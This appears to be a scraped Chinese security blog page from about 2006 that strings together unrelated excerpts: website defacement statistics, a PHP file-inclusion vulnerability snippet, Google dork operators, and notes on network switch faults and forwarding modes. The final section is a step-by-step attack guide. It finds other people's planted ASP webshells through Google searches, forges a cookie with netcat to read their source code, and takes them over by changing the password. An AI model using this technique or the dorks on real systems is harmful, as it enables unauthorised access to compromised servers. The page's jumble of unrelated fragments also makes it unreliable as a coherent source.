0- 总述
1- 分析
2- 相关防护
3- 总结

0- 总述

根据我们对中国被黑站点统计系统所有数据的分析，截至2006年9月19日0时，被篡改网站数量已达13000多个（其中有很多网站是多次被篡改），平均每天约有25个站点被篡改且被举报；又据CNCERT/CC（国家计算机网络应急技术处理协调中心）统计，2006年3月，全球被篡改网站数量超过3万个，平均每1.5分钟，就有一个网站被篡改…… 这些数目不是危言耸听。

» 阅读全文

curl.exe

curl 7.12.2 (i386-pc-win32) libcurl/7.12.2 OpenSSL/0.9.7e zlib/1.2.2
Protocols: ftp gopher telnet dict ldap http file https ftps
Features: Largefile NTLM SSL libz

作者: 疯狗
经常听到php文件包含漏洞,前一阵子贱心发现的BO-BLOG漏洞就是文件包含漏洞,可以用来执行一些命令,这个文件包含到底是怎样形成鸟?

可以简单的理解为乱用include();

$id=$_GET["id"]; include($id);

稀里糊涂的就把$id这个变量给引用了,但是不要单纯的理解为这个漏洞就是include了变量,include了文件也是有可能利用的,这个稍后在做介绍……

» 阅读全文

503 command

» 阅读全文

察看基本情况：
info:xx.com 返回一些基本信息
site:xx.com 返回所有与该有关的url
link:xx.com 返回所有与该站做了连接的站

site:xx.com filetype:txt 查找TXT文件 其他的依次内推

» 阅读全文

因为前几天用AIO和MT都克不了,今天看到了这个东东就帖过来了,记录一下
来源:http://www.secow.com/blog/article.asp?id=170

» 阅读全文

交换机运行中出现故障是不可避免的，但出现故障后应当迅速地进行处理，尽快查出故障点，排除故障，这是维护人员应尽的职责。但是要做到这一点，就必须了解交换机故障的类型及具备对故障进行分析和处理的能力。为此，本文就交换机常出现的故障类型及分析处理的方法作一简要的介绍。

1. 故障分类

　　从笔者多年来维护程控交换机的经验和在工作中遇到的故障来看，交换机的故障一般分为以下类型。
　　
　　具体类型是：

　　（1）电路板损坏
　　电路板上的元器件受损或基板不良，造成电路板不能正常工作。

　　（2）硬件工注不合适
　　硬件工注是为减少电路板的种类，而在电路板上设置的一组或几组开关，用以定义该电路板的工作状态或在系统中所处位置，如硬件工注设置得不正确，必会导致该电路板工作不正常。

　　（3）电路板块类型不合适
　　硬件更新后，同一名称的电路板块可能有多种不同的型号。在一般情况下，新型号电路板的功能会兼容旧型号电路板的功能，但旧型号的电路板的功能就不一定能兼容新型号电路板的功能了。

　　（4）机架、模块的问题
　　机架、模块用于承载电路板，按其在系统中的位置被分为处理机系统的机架、模块，交换系统的机架、模块和维护管理系统的机架、模块等。这些机架、模块也会出故障。

　　（5）设备供电的问题
　　整流器提供的-48V直流电被分配到每一个机架及相关的设备上，机架内的电源分配系统负责向模块供电，而每一模块上的电源电路板，都能根据模块内各电路板所需的电压进行调整，然后配送到每一块电路板上。但在这一过程中，任意环节出现问题，都有可能造成供电的故障。

» 阅读全文

交换机的传输方式有几种，有何不同？
答：交换机有Cut through、Store and forward和fragment free三种传输方式。

第一：Cut through传输方式接收到目的地址后即转发出去。这种方式延时小，但损坏的数据一样转发。

第二：Store-and-forward传输方式接收到完整的数据包后，校验好坏，好的转发，坏的丢弃重发。这种方式传输可靠，但其延时较长。

第三：Fragment free传输方式接收到数据包后，大于64bytes的转发，小于64bytes的丢弃。这种方式好坏介于上述两种方式之间。

思路是通过提交的COOKIE来查看木马的原代码，找出密码
看下面的代码
if trim(request.form("password"))=kiki then
response.cookies("password")="allen" <|>密码是否正确
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() <|>密码错误
response.end <|>停止运行
注意：response.cookies("password")="allen"
他没有要求SESSION认证，仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的，然后找到其密码。
还是实战一次：
1 找到一个后门，呵呵，不是我的，
在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字，你也可以换成别的，注意一定要加引号，表示不拆分字符串查询。
这样就找到了许多，呵呵，我选了一个，路径http://ip/images/globla.asp
2 在自己的计算机得到完好的COOKIE信息
我自己的木马http://ip/pic/xp.asp
用到一个工具winsock expert
登陆到自己的ASP木马，然后找到自己木马的路径，停！打开winsock expert选择监视对应的IE，然后回到IE点编辑，此时，IE显示出你的木马的原代码了，转到winsock expert 在前几行有一个用get 方法给你的木马的数据，我的是
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/pic.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
看到password=allen了么？这是ASP木马认证你是否登陆了方法。现在很简单了
把 数 据中所有的 ip 和路径改为别人的木马路径。还要将
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
中的PATH=后的值改为别人的木马路径。
我找的木马http://ip/images/globla.asp
所以我改后的数据是
GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/ima...
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
好了，保存在文本。
3 提交我们的数据
进入命令行，进入NC的目录,键入命令
nc -vv 202.202.202.202 80 >1.txt
>1.txt 表示将返回的信息保存在同目录的1.txt
一定要在CMD下键入命令，直接打开NC无法保存数据
呆会会提示连接成功，然后我门将作好的COOKIE粘贴在里面，然后按两次回车。
实际这时我门就通过了他的 验证并请求木马的原代码。
然后在同目录下1.txt就看到了木马的原代码，

<|>修改下面的kiki改为你密码
if trim(request.form("password"))=kiki then
哈哈，看到密码了，然后登陆吧，再改了密码，这个木马就是你的了。